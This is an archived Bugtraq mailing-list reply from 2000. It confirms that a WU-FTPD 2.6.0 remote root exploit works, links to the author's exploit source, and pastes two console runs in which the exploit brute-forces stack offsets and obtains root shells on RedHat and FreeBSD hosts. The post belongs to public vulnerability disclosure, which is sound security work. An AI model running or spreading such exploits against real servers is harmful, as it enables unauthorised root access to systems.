Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: Re: WuFTPD: Providing *remote* root since at least1994

Re: WuFTPD: Providing *remote* root since at least1994

From: Przemyslaw Frasunek <venglin_at_FREEBSD.LUBLIN.PL>
Date: Sat, 1 Jul 2000 17:12:35 +0200

> Has anyone come out with a working version of this exploit script. Both
> versions provided on the securityfocus.com web site, and or the one
distributed
> here by TF8 is not working, even after I fixed his code. Do we know for sure
> the thing even exists.. I dunno, can anyone direct me to the actual code,
> because I have yet to see a working version of it that doesn't CORE dump.

sure? both, tf8's and mine (http://v.freebsd.lublin.pl/sources/bobek.c), works
on my redhat and bsd boxes:

lubi:venglin:~> ./b -t 4 pedagog
Selected platform: RedHat Linux 6.2 with WUFTPD 2.6.0-RPM

Connected to pedagog. Trying to log in.
Logged in as ftp. Checking vulnerability.
Ok, trying to find offset (initial: 1024)
at offset 1024
at offset 1032
at offset 1040
at offset 1048
at offset 1056
at offset 1064
at offset 1072
at offset 1080
at offset 1088
at offset 1096
RET: 0x80759e0, RET location: 0xbfffcf74, RET location offset on stack: 1100
Reply size: 289, New RET: 0x80758bf
Wait 10-20 seconds for reply. Enjoy your shell.
[...]
0000000000000000000000000000000
Linux pedagog.xxx.xxx.xx 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
/
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)

another exaple:

lubi:venglin:~> ./b localhost
Selected platform: FreeBSD 3.4-STABLE with WUFTPD 2.6.0-ports

Connected to localhost. Trying to log in.
Logged in as ftp. Checking vulnerability.
Ok, trying to find offset (initial: 1024)
at offset 1024
at offset 1032
at offset 1040
at offset 1048
at offset 1056
at offset 1064
at offset 1072
RET: 0x80b1f10, RET location: 0xbfbfcc04, RET location offset on stack: 1076
Reply size: 527, New RET: 0x80b1d01
Wait 10-20 seconds for reply. Enjoy your shell.
[...]
00000000000000000000000000000000000000000000000000000000000000
FreeBSD lubi.xxx.xxx.xx 3.4-STABLE FreeBSD 3.4-STABLE #1: Wed Mar 1 11:18:54
CET 2000 venglin_at_lubi.xxx.xxx.xx:/mnt/elite/usr/src/sys/compile/GADACZKA
i386
/
uid=0(root) gid=0(wheel) egid=5(operator) groups=5(operator) 

--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglin_at_freebsd.lublin.pl ** PGP: D48684904685DF43  EA93AFA13BE170BF *
Received on Jul 02 2000
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos